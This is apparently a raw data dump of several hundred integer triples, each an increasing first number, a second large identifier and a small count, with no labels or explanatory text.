(24998208, 2637637530, 2),
(24998225, 584303793, 1),
(24998654, 2760155461, 1),
(24998669, 3657082077, 1),
(24998769, 1123632580, 2),
(24998795, 1123632580, 1),
(24998944, 3024883600, 1),
(24998944, 3024883592, 1),
(24998944, 3024883605, 1),
(24998947, 1123632580, 1),
(24998990, 3657082077, 1),
(24999072, 3250483965, 1),
(24999145, 3657082077, 1),
(24999146, 520974916, 1),
(24999146, 1463821037, 4),
(24999204, 3154453301, 1),
(24999283, 2637637429, 1),
(24999329, 3024883465, 1),
(24999340, 3154453301, 1),
(24999345, 1538656104, 2),
(24999375, 3657082077, 1),
(24999418, 3657082077, 1),
(24999472, 3657082077, 1),
(24999475, 1123634077, 1),
(24999508, 1375113052, 1),
(24999554, 3657082077, 1),
(24999608, 3264835941, 4),
(24999698, 3657082077, 1),
(24999713, 1123632645, 1),
(24999719, 1161474618, 9),
(24999749, 1123632645, 1),
(24999775, 2957688868, 10),
(24999867, 676177789, 1),
(24999877, 1123632645, 1),
(25000012, 2637637429, 1),
(25000101, 1123632645, 1),
(25000124, 96753435, 1),
(25000124, 2303381409, 1),
(25000205, 3373404845, 1),
(25000233, 1123632645, 2),
(25000257, 3652607482, 9),
(25000304, 1123632645, 1),
(25000407, 584016457, 2),
(25000575, 2760155812, 1),
(25000677, 3649630461, 3),
(25000678, 3649630461, 3),
(25000700, 1123632645, 1),
(25000751, 1123632645, 1),
(25000759, 2194900209, 1),
(25000759, 1538656104, 2),
(25000825, 1538656104, 2),
(25000885, 3475901893, 1),
(25001011, 1375113052, 1),
(25001150, 1399309361, 2),
(25001192, 1837280593, 2),
(25001535, 1123632645, 1),
(25001587, 2538613875, 2),
(25001654, 1538656104, 2),
(25001831, 2996488251, 1),
(25001831, 1476059143, 1),
(25001831, 2996488242, 1),
(25001965, 1123632645, 2),
(25001974, 2637637469, 1),
(25001985, 3475901892, 1),
(25002113, 1123632645, 1),
(25002206, 1742919172, 2),
(25002291, 1123632645, 1),
(25002357, 1538656104, 2),
(25002363, 1123632645, 1),
(25002396, 3512711551, 1),
(25002398, 1538656104, 2),
(25002447, 1538656104, 2),
(25002454, 1538656104, 2),
(25002468, 3582305802, 1),
(25002483, 2745986569, 8),
(25002484, 2745986569, 1),
(25002525, 1123632645, 1),
(25002544, 3582305802, 2),
(25002605, 1837280593, 2),
(25002616, 1123632645, 1),
(25002683, 1123632645, 1),
(25002702, 3582305802, 1),
(25002722, 3475901892, 1),
(25002723, 1123632645, 1),
(25002946, 3003111232, 2),
(25003058, 3301852133, 1),
(25003136, 1374958463, 3),
(25003149, 1123632645, 1),
(25003155, 96753435, 1),
(25003155, 2760155429, 1),
(25003182, 624870556, 2),
(25003183, 624870556, 2),
(25003195, 1055643623, 1),
(25003241, 976357689, 2),
(25003340, 1463849781, 3),
(25003342, 1463849781, 3),
(25003343, 1463849781, 2),
(25003344, 1463849781, 1),
(25003345, 1463849781, 1),
(25003350, 1463849781, 1),
(25003352, 1463849781, 1),
(25003444, 1123632645, 2),
(25003488, 2745959577, 1),
(25003781, 976357689, 2),
(25003783, 3475901892, 1),
(25003844, 1123631236, 1),
(25004114, 3582305802, 1),
(25004231, 3475901822, 1),
(25004317, 872366381, 1),
(25004505, 3475901892, 1),
(25004660, 1806327814, 1),
(25004690, 3475901729, 1),
(25004982, 1375113052, 1),
(25005019, 1532393936, 1),
(25005080, 786801766, 1),
(25005233, 2637637520, 1),
(25005276, 1375113052, 1),
(25005325, 1375113052, 1),
(25005451, 1123631236, 1),
(25005655, 872366417, 1),
(25005907, 2760155399, 1),
(25005952, 3024883471, 1),
(25005964, 2637637538, 1),
(25006001, 1538358128, 2),
(25006002, 1538358128, 2),
(25006039, 96753435, 1),
(25006039, 872368002, 1),
(25006055, 1538358128, 2),
(25006229, 3657084759, 1),
(25006394, 3103966404, 1),
(25006394, 3256705680, 1),
(25006473, 1399309361, 2),
(25006550, 3657084759, 1),
(25006634, 872366347, 1),
(25006679, 1427857479, 1),
(25006681, 1427857479, 1),
(25006700, 1375113052, 1),
(25006705, 3657084759, 1),
(25006710, 2637637538, 1),
(25006726, 873502953, 2),
(25006740, 1427857479, 1),
(25006743, 1123632645, 1),
(25006769, 1532381390, 1),
(25006935, 3657084759, 1),
(25006978, 3657084759, 1),
(25007010, 1538592859, 2),
(25007026, 2916154802, 2),
(25007032, 3657084759, 1),
(25007084, 1399309361, 2),
(25007117, 3657084759, 1),
(25007258, 3657084759, 1),
(25007319, 1123632645, 2),
(25007433, 2637637538, 1),
(25007477, 1123632645, 1),
(25007532, 1123632645, 1),
(25007559, 2513063484, 1),
(25007614, 3250520646, 3),
(25007615, 3250520646, 1),
(25007616, 3250520646, 5),
(25007743, 1806133391, 1),
(25007744, 1806133391, 1),
(25007745, 1806133391, 1),
(25007745, 3250520646, 1),
(25007749, 3250520646, 2),
(25007750, 3250520646, 3),
(25007751, 3250520646, 1),
(25048494, 1123634998, 2),
(25048496, 1123634998, 3),
(25048497, 1123634998, 2),
(25048498, 1123634998, 2),
(25048500, 1123634998, 2),
(25048501, 1123634998, 1),
(25048502, 1123634998, 1),
(25048503, 1123634998, 2),
(25048504, 1123634998, 1),
(25048506, 1123634998, 1),
(25048507, 1123634998, 1),
(25048509, 1123634998, 1),
(25048510, 1123634998, 2),
(25049322, 1123634998, 1),
(25049856, 1123634998, 1),
(25049856, 1123635001, 1),
(25049856, 1123634992, 1),
(25049857, 1123634992, 1),
(25049858, 1123634992, 2),
(25049861, 1123634992, 4),
(25049864, 1123634992, 1),
(25049866, 1123634992, 1),
(25049867, 1123634992, 1),
(25049869, 1123634992, 1),
(25049871, 1123634992, 1),
(25053642, 1123631813, 2),
(25054046, 1405730122, 1),
(25057962, 1123631813, 2),
(25062282, 1123631173, 2),
(25065510, 3475901888, 1),
(25065510, 676177847, 1),
(25066602, 1123634998, 2),
(25070426, 1123631496, 2),
(25070462, 1123631496, 1),
(25070922, 1123631496, 1),
(25071454, 1123631127, 1),
(25075242, 1123631127, 2),
(25075960, 1123631127, 1),
(25076213, 1123631127, 1),
(25092322, 2637637398, 1),
(25092365, 2637637432, 1),
(25093600, 3026316553, 3),
(25093601, 3026316553, 5),
(25094070, 1123631127, 3),
(25094308, 1123631127, 2),
(25099238, 1123631127, 1),
(25105833, 1123631576, 1),
(25110037, 2637637424, 1),
(25110780, 2637637520, 1),
(25111527, 2637637520, 1),
(25114390, 1123631121, 2),
(25114621, 2637637520, 1),
(25115921, 1123631813, 2),
(25117057, 2637637520, 1),
(25119338, 1123631127, 1),
(25120011, 2637637378, 1),
(25120802, 2637637427, 1),
(25120804, 2637637451, 1),
(25123139, 2637637427, 1),
(25125420, 2637637394, 1),
(25126152, 2637637394, 1),
(25128575, 3475901895, 1),
(25131942, 2637637426, 1),
(25134407, 2637637402, 1),
(25137300, 2637637402, 1),
(25138080, 3475901895, 1),
(25138175, 1123631127, 2),
(25138340, 3475901697, 1),
(25139863, 1123635013, 1),
(25140112, 3475901895, 1),
(25144350, 3427775505, 1),
(25145320, 1123631576, 2),
(25145492, 1123631576, 1),
(25146475, 1555588441, 1),
(25146502, 3475901900, 1),
(25146513, 676177796, 1),
(25150793, 1123631752, 2),
(25156294, 1123631127, 1),
(25161353, 1123634117, 2),
(25162144, 1123634117, 1),
(25180647, 3475901899, 1),
(25181102, 2637637455, 1),
(25182401, 1123634076, 2),
(25188504, 1123631813, 2),
(25189136, 1123631813, 1),
(25191282, 2637637389, 1),
(25191346, 676177766, 1),
(25197590, 1123631127, 1),
(25203323, 1123633996, 1),
(25208041, 1123634948, 2),
(25213765, 1123631127, 1),
(25224815, 2637637433, 1),
(25228460, 1123631813, 1),
(25229837, 2637637378, 1),
(25229838, 3475901716, 1),
(25229901, 1123631813, 1),
(25232465, 1123631813, 2),
(25234942, 1123633421, 1),
(25237058, 1123631127, 1),
(25242445, 3475901892, 1),
(25242786, 3475901858, 1),
(25242970, 1123634998, 1),
(25246541, 1123631127, 1),
(25255130, 1123631127, 2),
(25271014, 1123631752, 1),
(25271014, 1123631625, 1),
(25271241, 1123631625, 1),
(25274402, 1123631813, 1),
(25283818, 1123631813, 1),
(25297157, 1123631173, 1),
(25300907, 1123633950, 2),
(25311785, 1123633541, 1),
(25315521, 1123635045, 1),
(25320490, 1123631173, 1),
(25323816, 3639886562, 1),
(25326117, 1123631813, 1),
(25328137, 1123631813, 1),
(25328138, 1123631813, 1),
(25332548, 1123634998, 1),
(25334302, 1123631813, 1),
(25339599, 1123631127, 1),
(25348060, 1123632617, 2),
(25351545, 1123632617, 2),
(25351869, 2637637391, 1),
(25352287, 3475901771, 1),
(25356687, 1123631127, 1),
(25360668, 2637637428, 1),
(25361408, 2637637391, 1),
(25361589, 1123631127, 1),
(25367254, 1123631127, 2),
(25372067, 1123631813, 1),
(25376418, 1123631127, 2),
(25376664, 1123631127, 1),
(25376942, 1123631127, 1),
(25377032, 1123631127, 1),
(25377077, 1123631127, 1),
(25388369, 1123631173, 1),
(25402037, 1123631496, 2),
(25404378, 1123635045, 1),
(25409631, 1123631127, 1),
(25413901, 1123631127, 1),
(25418816, 1123631496, 1),
(25421230, 1123635045, 1),
(25432574, 1123633950, 2),
(25432707, 1123633950, 1),
(25432751, 1123633950, 1),
(25433539, 1123631813, 1),
(25434131, 1123631813, 2),
(25435915, 1123631127, 1),
(25436215, 1123631496, 1),
(25437476, 1123631496, 2),
(25438697, 1123631813, 1),
(25443127, 1123635045, 2),
(25444569, 1123631813, 1),
(25445410, 1123631813, 1),
(25445458, 1123631813, 3),
(25445503, 1123631813, 2),
(25445559, 1123631813, 1),
(25446110, 3587411701, 1),
(25446572, 1123631813, 2),
(25446575, 1123631813, 1),
(25447152, 1123631813, 1),
(25447203, 1123631813, 1),
(25448868, 1123631813, 1),
(25450893, 1123634076, 2),
(25451447, 1123634076, 1),
(25453996, 3639886562, 1),
(25455566, 3639886537, 1),
(25459795, 1123635045, 2),
(25459909, 1123635045, 1),
(25461605, 1123631813, 2),
(25461668, 1123631813, 1),
(25461751, 1123631813, 1),
(25461766, 1123631813, 1),
(25463164, 1123631813, 1),
(25488416, 1123632542, 1),
(25488748, 1123632542, 1),
(25488886, 1123632542, 1),
(25495978, 1123631127, 1),
(25495979, 1123631127, 1),
(25499433, 1123631813, 1),
(25500902, 1123631813, 1),
(25504720, 1123631813, 1),
(25505337, 1123631813, 1),
(25505906, 1123631752, 1),
(25507765, 1123631752, 1),
(25509031, 1123631752, 1),
(25521009, 1123632611, 2),
(25526607, 1123633950, 2),
(25526797, 1123633950, 1),
(25533585, 1123632611, 2),
(25533666, 1123632611, 5),
(25533667, 1123632611, 2),
(25533668, 1123632611, 1),
(25533788, 1123632611, 1),
(25533848, 1123632611, 1),
(25534036, 1123632611, 2),
(25534453, 1123632611, 1),
(25534920, 1123632611, 1),
(25535144, 1123632611, 2),
(25540260, 1123634076, 1),
(25541439, 1123634076, 1),
(25541833, 1123634076, 2),
(25541835, 1123634076, 1),
(25543146, 1123634076, 1),
(25543415, 1123634076, 1),
(25545634, 1123634076, 1),
(25545656, 1123634076, 1),
(25545657, 1123634076, 1),
(25545659, 1123634076, 1),
(25545660, 1123634076, 1),
(25545661, 1123634076, 1),
(25545842, 1123634076, 1),
(25547328, 1123634076, 2),
(25547460, 1123634076, 1),
(25547557, 1123634076, 1),
(25547786, 1123634076, 1),
(25548245, 1123634076, 1),
(25548300, 1123634076, 1),
(25548448, 1123634076, 1),
(25548565, 1123634076, 1),
(25548877, 1123634076, 3),
(25549013, 1123634076, 1),
(25549364, 1123634076, 1),
(25549817, 1123634076, 1),
(25557807, 1123633541, 2),
(25558026, 1123633541, 1),
(25558321, 1123633541, 1),
(25558736, 1123633541, 1),
(25559358, 1123633541, 2),
(25561451, 1123631752, 2),
(25562011, 1123631752, 1),
(25563988, 2637637509, 1),
(25564038, 1123632611, 1),
(25564050, 2637637446, 1),
(25569445, 1123631813, 2),
(25573526, 1123631173, 2),
(25573638, 1123631173, 1),
(25574024, 1123635045, 1),
(25574085, 1123635045, 1),
(25574182, 1123635045, 1),
(25574246, 1123635045, 1),
(25574337, 1123635045, 1),
(25574418, 1123635045, 1),
(25582468, 1123631752, 2),
(25582588, 1123631752, 1),
(25582708, 1123631752, 1),
(25582828, 1123631752, 1),
(25582896, 1123631752, 1),
(25583024, 1123631752, 2),
(25591148, 1123631752, 2),
(25591268, 1123631752, 1),
(25591348, 1123631752, 2),
(25591458, 3639886537, 1),
(25591773, 2637637376, 1),
(25591796, 1123631752, 1),
(25591800, 1123631752, 1),
(25591809, 1123631752, 1),
(25591813, 1123631752, 1),
(25591819, 1123631752, 1),
(25591822, 1123631752, 1),
(25591824, 1123631752, 1),
(25600358, 3475901769, 1),
(25600841, 1123631752, 2),
(25603394, 3475901769, 1),
(25603784, 1123631752, 2),
(25604420, 1123631752, 1),
(25606713, 1123631752, 2),
(25611417, 1123631772, 1),
(25612434, 3475901893, 1),
(25612834, 1123631752, 1),
(25612858, 2637637470, 1),
(25613969, 1123631752, 2),
(25617902, 1123631237, 2),
(25618132, 1123631237, 1),
(25618185, 1123631237, 1),
(25618468, 1123631237, 1),
(25618629, 1123631237, 1),
(25618729, 1123631237, 1),
(25618978, 1123631237, 2),
(25623973, 1123635141, 2),
(25624010, 1123635141, 1),
(25624141, 1123635141, 1),
(25624211, 1123635141, 1),
(25624342, 1123635141, 1),
(25624553, 1123635045, 1),
(25624744, 1123635045, 1),
(25625137, 1123635045, 1),
(25625412, 1123635045, 1),
(25625704, 1123635045, 2),
(25626158, 1123635045, 1),
(25626249, 1123635045, 1),
(25626640, 1123635045, 1),
(25626721, 1123635045, 1),
(25627163, 1123635045, 2),
(25627274, 1123635045, 1),
(25627465, 1123635045, 1),
(25627576, 1123635045, 1),
(25627687, 1123635045, 1),
(25627847, 1123635045, 1),
(25627928, 1123635045, 1),
(25627998, 1123635045, 1),
(25628149, 1123635045, 1),
(25628310, 1123635045, 1),
(25628371, 1123635045, 1),
(25628522, 1123635045, 1),
(25628683, 1123635045, 2),
(25628882, 1123635045, 1),
(25632901, 1123632542, 2),
(25632971, 1123632542, 1),
(25633222, 1123631752, 1),
(25633343, 1123631752, 1),
(25633504, 1123631752, 1),
(25633695, 1123631752, 1),
(25634209, 1123631752, 1),
(25634356, 1123631752, 2),
(25634498, 1123631525, 1),
(25634628, 1123631525, 1),
(25634930, 1123631525, 1),
(25635041, 1123631525, 2),
(25640813, 1123631752, 1),
(25642200, 1123631752, 1),
(25642852, 1123631772, 2),
(25643474, 1123631752, 1),
(25643882, 1123631752, 1),
(25643922, 1123631752, 2),
(25643923, 1123631752, 2),
(25643962, 1123631752, 1),
(25644072, 1123631752, 1),
(25644492, 1123631752, 2),
(25644493, 1123631752, 1),
(25644494, 1123631752, 1),
(25644499, 1123631752, 1),
(25644545, 1123631752, 2),
(25644546, 1123631752, 1),
(25644565, 1123631752, 1),
(25644625, 1123631752, 1),
(25644775, 1123631752, 1),
(25645362, 1123631752, 1),
(25645896, 1123631752, 1),
(25645946, 1123631752, 2),
(25648260, 1123632581, 2),
(25648835, 1123632581, 1),
(25649467, 1123631752, 1),
(25650403, 1123631752, 2),
(25651269, 1123631752, 1),
(25651934, 1123631752, 2),
(25653549, 1123631752, 1),
(25654813, 1123631752, 1),
(25654821, 1123631752, 1),
(25659124, 1123631576, 1),
(25659634, 1123631576, 1),
(25660297, 1123631496, 1),
(25660659, 1123631496, 2),
(25661487, 1123631127, 1),
(25664709, 1123631127, 2),
(25665587, 1123631127, 1),
(25666370, 1123631127, 2),
(25667154, 1123631127, 1),
(25668559, 1123631127, 2),
(25669252, 1123631127, 1),
(25670012, 1123631127, 2),
(25670656, 1123631127, 1),
(25671399, 1123631127, 1),
(25676013, 1123631173, 2),
(25676536, 1123631173, 1),
(25677131, 1123631173, 1),
(25677682, 1123634076, 3),
(25678326, 1123634076, 1),
(25679049, 1123631525, 1),
(25679803, 1123631525, 2),
(25680387, 1123631525, 1),
(25680954, 1123631752, 2),
(25680955, 1123631752, 1),
(25680956, 1123631752, 1),
(25680957, 1123631752, 1),
(25681427, 1123631752, 1),
(25686061, 1123631173, 2),
(25686634, 1123631173, 1),
(25687290, 1123631173, 1),
(25687720, 1123631173, 2),
(25688368, 1123631173, 1),
(25688398, 1123631173, 1),
(25688459, 1123631173, 1),
(25688519, 1123631173, 1),
(25692159, 1123631173, 1),
(25692160, 1123631173, 1),
(25693372, 1123631173, 1),
(25695835, 1123631576, 2),
(25696349, 1123631173, 1),
(25696379, 1123631173, 2),
(25696383, 1123631173, 1),
(25696458, 1123631173, 1),
(25696903, 1123631173, 1),
(25697245, 1123631173, 1),
(25697507, 1123631173, 2),
(25698081, 1123631752, 1),
(25698915, 1123631752, 1),
(25704756, 1123631173, 2),
(25706312, 1123631127, 2),
(25707125, 1123631127, 1),
(25710637, 1123632581, 1),
(25711157, 1123632581, 1),
(25712044, 1123631496, 1),
(25715885, 1123634948, 2),
(25717311, 1123631752, 1),
(25717331, 1123631752, 2),
(25718002, 1123631752, 1),
(25718052, 1123631752, 1),
(25718493, 1123631752, 1),
(25718765, 1123631752, 1),
(25718772, 1123631752, 2),
(25718773, 1123631752, 1),
(25718896, 1123631752, 1),
(25718927, 1123631752, 1),
(25719078, 1123631752, 1),
(25719333, 1123631752, 1),
(25719334, 1123631752, 1),
(25719444, 1123631752, 1),
(25721709, 1123631752, 2),
(25722519, 1123631752, 1),
(25726550, 1123631173, 2),
(25727616, 1123631173, 1),
(25727686, 1123631173, 1),
(25727706, 1123631173, 1),
(25728325, 1123632611, 2),
(25728988, 1123632611, 1),
(25729096, 1123632611, 1),
(25729518, 1123632611, 1),
(25730731, 1123632611, 1),
(25732966, 1123631576, 1),
(25737518, 1123634948, 2),
(25737529, 1123634948, 1),
(25738803, 1123631301, 1),
(25739384, 1123631301, 2),
(25739425, 1123631301, 1),
(25739485, 1123631301, 1),
(25739947, 1123632581, 1),
(25740582, 1123632581, 1),
(25741322, 1123632581, 2),
(25741976, 1123632581, 1),
(25742569, 1123631752, 1),
(25742890, 1123631752, 1),
(25744467, 1123631752, 1),
(25746994, 2637637392, 1),
(25748850, 1123631301, 2),
(25754441, 2509958044, 2),
(25754510, 1123631301, 2),
(25754514, 1123631301, 2),
(25754515, 1123631301, 1),
(25754865, 2637637392, 1),
(25755089, 1123631301, 1),
(25756104, 3639886537, 1),
(25756135, 1123634948, 2),
(25756734, 1123634948, 2),
(25757241, 1123631301, 1),
(25757242, 1123631301, 3),
(25757243, 1123631301, 1),
(25757467, 1123631301, 1),
(25757468, 1123631301, 2),
(25757489, 1123631301, 1),
(25757513, 1123631301, 1),
(25757633, 1123631301, 2),
(25757680, 1123631301, 1),
(25758909, 1123631301, 1),
(25758910, 1123631301, 1),
(25758911, 1123631301, 1),
(25759290, 1123631301, 2),
(25761722, 3639886537, 1),
(25763983, 1123631752, 1),
(25765396, 1459547057, 1),
(25766686, 1123632581, 2),
(25767234, 3639886537, 1),
(25767259, 1123631576, 1),
(25768236, 1123631752, 2),
(25768809, 1123631752, 1),
(25769500, 1055649381, 1),
(25769513, 1123631752, 1),
(25770040, 1123631301, 2),
(25770181, 1123631301, 1),
(25770201, 1123631301, 1),
(25770301, 1123631301, 2),
(25770311, 1123631301, 1),
(25770312, 1123631301, 1),
(25770643, 1123631301, 1),
(25771216, 1123631301, 1),
(25772708, 1123634948, 1),
(25775524, 1123631301, 2),
(25776777, 1123631301, 1),
(25777171, 1123631301, 1),
(25778072, 1123631301, 1),
(25780921, 1123631301, 2),
(25781806, 2637637410, 1),
(25782606, 1123631301, 2),
(25784760, 1123631576, 1),
(25786012, 1123631813, 1),
(25786536, 1123631813, 1),
(25786536, 1123631653, 1),
(25787111, 1123631752, 1),
(25787191, 1123631752, 1),
(25787231, 1123631752, 1),
(25787462, 1123631752, 1),
(25787673, 1123631752, 1),
(25788275, 1123631752, 2),
(25794235, 1123631752, 2),
(25794366, 1123631752, 1),
(25794437, 1123631752, 1),
(25794709, 1123631752, 1),
(25795856, 1123631752, 1),
(25796562, 1123631752, 1),
(25797433, 1123631752, 2),
(25801883, 1123632611, 1),
(25804067, 1123631269, 2),
(25804107, 1123631295, 1),
(25804188, 1123631269, 1),
(25804309, 1123631269, 1),
(25804330, 1123631269, 1),
(25804778, 1123631576, 1),
(25804920, 1123631576, 1),
(25804950, 1123631525, 1),
(25805389, 1123631576, 1),
(25806789, 1123631752, 1),
(25813292, 1123634975, 1),
(25813462, 1123634948, 2),
(25813542, 1123634948, 1),
(25814155, 1123634948, 1),
(25816345, 1123631752, 1),
(25816571, 1123631752, 1),
(25818711, 1123633950, 1),
(25819616, 1123633950, 1),
(25820085, 1123633932, 1),
(25820446, 1123631269, 2),
(25822714, 1123631576, 2),
(25829329, 1123631576, 1),
(25829330, 1123631576, 1),
(25829962, 1123631557, 1),
(25830274, 1123631576, 1),
(25830869, 1123634948, 2),
(25831220, 1123634948, 1),
(25831436, 1123634948, 1),
(25832048, 1123634948, 1),
(25832118, 1123634948, 1),
(25839477, 1123634076, 2),
(25839568, 1123634076, 1),
(25840997, 1123631752, 2),
(25841000, 1123631752, 2),
(25841001, 1123631752, 1),
(25841002, 1123631752, 1),
(25841716, 1123631752, 1),
(25842471, 1123631301, 2),
(25843136, 1123631301, 1),
(25843334, 1123631173, 1),
(25843384, 1123631301, 1),
(25843485, 1123631752, 1),
(25849417, 1123634950, 2),
(25849537, 1123634950, 1),
(25849547, 1123634950, 1),
(25849567, 1123634950, 1),
(25849769, 1123634950, 1),
(25850088, 1123634950, 1),
(25850430, 1123634950, 1),
(25850591, 1123634950, 1),
(25850722, 1123631748, 1),
(25850752, 1123631748, 1),
(25851043, 1123631748, 2),
(25851168, 1123631748, 1),
(25852750, 1123631748, 2),
(25852780, 1123631748, 1),
(25852910, 1123631748, 1),
(25853041, 1123631748, 1),
(25853382, 1123631748, 1),
(25853537, 1123631748, 1),
(25854120, 1123631748, 1),
(25857082, 1123632613, 1),
(25858810, 1123631773, 1),
(25858850, 1123631748, 2),
(25858911, 1123631748, 1),
(25859091, 1123631270, 1),
(25859443, 1123631270, 1),
(25859494, 1123631270, 1),
(25859504, 1123631270, 1),
(25859554, 1123631270, 1),
(25859594, 1123631270, 1),
(25859654, 1123631270, 1),
(25860086, 1123631270, 1),
(25860137, 1123631270, 1),
(25860147, 1123631270, 1),
(25860187, 1123631270, 1),
(25860207, 1123631270, 1),
(25860238, 1123631270, 1),
(25860728, 1123631270, 1),
(25868274, 1123631553, 1),
(25868637, 1123631564, 2),
(25868847, 1123631564, 1),
(25868994, 1123631564, 1),
(25869013, 1123631564, 1),
(25869152, 1123631564, 1),
(25869172, 1123631564, 1),
(25869223, 1123631564, 1),
(25869364, 1123634950, 1),
(25869534, 1123634950, 1),
(25869563, 1123634950, 1),
(25869754, 1123634950, 1),
(25869845, 1123634950, 1),
(25869976, 1123634950, 1),
(25869986, 1123634950, 1),
(25870515, 1123634950, 1),
(25872575, 1123632613, 1),
(25878249, 1123631291, 1),
(25879038, 1123631270, 2),
(25879098, 1123631748, 1),
(25879128, 1123631270, 1),
(25879158, 1123631270, 1),
(25879218, 1123631748, 1),
(25879299, 1123631748, 1),
(25879549, 1123631748, 1),
(25879609, 1123631748, 1),
(25879754, 1123631748, 1),
(25887703, 1123631553, 1),
(25887997, 1123632613, 2),
(25888451, 1123632613, 1),
(25888502, 1123632613, 1),
(25888705, 1123632613, 1),
(25888723, 1123632613, 1),
(25888733, 1123632613, 1),
(25888823, 1123632613, 1),
(25888984, 1123632613, 1),
(25890366, 1123634950, 1),
(25891910, 3267064321, 1),
(25891929, 3281676292, 1),
(25894919, 1123631814, 1),
(25897424, 1123631291, 1),
(25897635, 1123631270, 2),
(25897656, 1123631270, 1),
(25897686, 1123631270, 1),
(25897927, 1123631270, 1),
(25898096, 1123631270, 1),
(25898328, 1123631270, 1),
(25898458, 1123631814, 1),
(25898489, 1123631814, 1),
(25898549, 1123631814, 1),
(25898559, 1123631814, 1),
(25898579, 1123631814, 1),
(25898619, 1123631814, 1),
(25898730, 1123631814, 1),
(25898910, 1123631814, 1),
(25899030, 1123631814, 1),
(25899050, 1123631814, 1),
(25899100, 1123631814, 2),
(25899130, 1123631814, 1),
(25899160, 1123631814, 1),
(25899443, 1123631814, 1),
(25899797, 3639886537, 1),
(25901533, 1123634072, 1),
(25905949, 1123631564, 1),
(25907436, 1123635046, 1),
(25907502, 1123635067, 1),
(25908246, 1123635046, 1),
(25908357, 1123635046, 1),
(25908398, 1123635046, 1),
(25908686, 1123634950, 1),
(25908707, 1123634950, 1),
(25908957, 1123634950, 2),
(25908996, 1123634950, 1),
(25909075, 1123634950, 1),
(25909176, 1123634950, 1),
(25909256, 1123632613, 1),
(25909387, 1123632613, 1),
(25909517, 1123632613, 1),
(25911161, 1123632613, 1),
(25917158, 1123631835, 1),
(25917771, 1123631814, 1),
(25917771, 1123631684, 1),
(25918254, 1123631814, 1),
(25918395, 1123631814, 1),
(25918593, 1123631814, 1),
(25918814, 1123631814, 1),
(25918885, 1123631814, 1),
(25918925, 1123631814, 1),
(25919119, 1123631270, 1),
(25919122, 1123631270, 1),
(25919186, 1123631270, 1),
(25919198, 1123631270, 1),
(25919439, 1123631270, 2),
(25919469, 1123631270, 1),
(25919481, 1123631270, 1),
(25919683, 1123631270, 1),
(25919802, 1123631270, 1),
(25926908, 1123631553, 1),
(25926948, 1123631564, 2),
(25926979, 1123631564, 1),
(25927029, 1123631564, 1),
(25927089, 1123631564, 1),
(25927129, 1123631564, 1),
(25927361, 1123631564, 1),
(25927563, 1123631564, 1),
(25927824, 1123632582, 1),
(25927944, 1123632582, 1),
(25928119, 1123632582, 1),
(25928562, 1123632582, 2),
(25928742, 1123632582, 1),
(25929324, 1123632582, 1),
(25938984, 1123631270, 2),
(25939105, 1123631270, 1),
(25939568, 1123631270, 1),
(25940191, 1123634950, 1),
(25941007, 1123634950, 2),
(25941209, 1123634971, 1),
(25942136, 1123632582, 1),
(25942191, 632885948, 1),
(25942193, 632885948, 2),
(25943269, 1123631564, 2),
(25945725, 1123632582, 1),
(25947334, 1123632582, 1),
(25948837, 1123632582, 2),
(25949428, 1123632582, 1),
(25950024, 1123632582, 1),
(25950616, 1123632582, 2),
(25959222, 1123631291, 1),
(25959322, 1123631270, 2),
(25959906, 1123631270, 1),
(25960414, 1123631814, 1),
(25961008, 1123631814, 2),
(25963927, 1123634950, 1),
(25965839, 1123634950, 1),
(25969505, 1123633948, 2),
(25969509, 1123633948, 1),
(25969545, 1123633948, 1),
(25970234, 1123633948, 1),
(25970889, 1123631814, 1),
(25971038, 1123631835, 1),
(25971592, 1538515997, 1),
(25979976, 1123631270, 2),
(25980007, 1123631270, 1),
(25980108, 1123631270, 1),
(25981176, 1123631564, 1),
(25981239, 1123631564, 1),
(25981781, 1123631564, 2),
(25981870, 1123631564, 1),
(25982373, 1123634950, 1),
(25982433, 1123634950, 1),
(25982957, 1123634950, 1),
(25990503, 1123633937, 1),
(25990560, 1123633948, 2),
(25990873, 1123633948, 1),
(25991136, 1123633948, 1),
(25991266, 1439284614, 1),
(25991398, 1123633948, 1),
(25991770, 1123631814, 1),
(25992472, 1123631814, 2),
(25992778, 1837892844, 2),
(25992779, 1837892844, 1),
(25998266, 1123631564, 1),
(25999717, 1123631564, 2),
(25999882, 1538574586, 1),
(25999883, 1538574586, 1),
(26000681, 1123631564, 1),
(26001164, 1123631270, 1),
(26001265, 1123631270, 1),
(26001549, 1123631270, 1),
(26001758, 1584214706, 1),
(26002193, 1123631270, 1),
(26002736, 1123634950, 2),
(26002806, 1123634950, 1),
(26003509, 1123634950, 1),
(26003568, 1123634950, 1),
(26004037, 1123634950, 1),
(26004661, 1123634950, 2),
(26008717, 1430572848, 2),
(26010154, 1123632422, 2),
(26010470, 1123632443, 1),
(26011304, 1123632422, 1),
(26011948, 1123631814, 2),
(26012090, 1123631814, 1),
(26012750, 1123631814, 1),
(26012810, 1123631814, 1),
(26013081, 1123631814, 1),
(26013543, 1123631814, 2),
(26013911, 1123631814, 1),
(26024165, 1123634950, 1),
(26025170, 1123634950, 1),
(26025442, 1123634950, 1),
(26025553, 1123634950, 1),
(26026047, 1123634950, 2),
(26026621, 1123631270, 1),
(26027347, 1123631270, 1),
(26027357, 1123631284, 1),
(26028071, 1123632422, 2),
(26028665, 1123632422, 1),
(26028825, 1123632422, 1),
(26029277, 1123631814, 1),
(26029538, 1123631814, 2),
(26030050, 1123631814, 1),
(26030624, 1123631270, 1),
(26031676, 1123631270, 1),
(26031814, 1834531253, 1),
(26031815, 1834531253, 3),
(26032244, 3639886537, 1),
(26032736, 1463961952, 3),
(26033164, 1123632422, 1),
(26033167, 1123632422, 1),
(26035614, 1123631526, 2),
(26036146, 1123631526, 1),
(26036798, 1123631270, 1),
(26041695, 1123631270, 2),
(26041808, 1439284614, 1),
(26042228, 1123634950, 1),
(26043015, 1123634950, 1),
(26047996, 1123631280, 2),
(26048789, 1123631814, 1),
(26049684, 1123631814, 2),
(26050205, 1123631814, 1),
(26052940, 1123631814, 1),
(26054439, 1123631814, 2),
(26055424, 1123632422, 1),
(26056073, 1123632422, 1),
(26056178, 1123632422, 1),
(26062181, 1123634950, 2),
(26062775, 1123634950, 1),
(26063863, 1123631270, 2),
(26064445, 1123631270, 1),
(26070285, 1123631814, 2),
(26071081, 1123631814, 1),
(26071791, 1123631814, 2),
(26076695, 1837498020, 1),
(26078930, 1123634950, 1),
(26081688, 1123631270, 2),
(26082284, 1123631270, 1),
(26083017, 1123633938, 1),
(26089014, 1123631835, 1),
(26089271, 3576813415, 2),
(26090215, 1123631270, 2),
(26090689, 1123631270, 1),
(26091475, 1123631270, 1),
(26092198, 1123631282, 1),
